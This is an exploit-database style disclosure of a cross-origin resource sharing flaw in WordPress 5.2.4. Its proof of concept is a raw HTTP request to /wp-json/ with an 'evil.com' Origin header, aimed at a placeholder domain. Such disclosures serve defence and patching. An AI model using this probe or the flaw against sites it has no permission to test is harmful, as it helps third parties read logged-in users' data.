Exploits / Vulnerability Discovered : 2019-10-29 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress core 5.2.4 crossorigin resource sharing is for educational purposes only and if it is used you will do on your own risk!
# POC:
# The web application fails to properly validate the Origin header (check Details section for more information)
# and returns the header Access-Control-Allow-Credentials: true. In this configuration any website can issue
# requests made with user credentials and read the responses to these requests. Trusting arbitrary
# origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites.
# REGUEST -->
GET /wp-json/ HTTP/1.1
Origin: https://www.evil.com
Accept: */*
Accept-Encoding: gzip,deflate
Host: [Your-Domain]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Connection: Keep-alive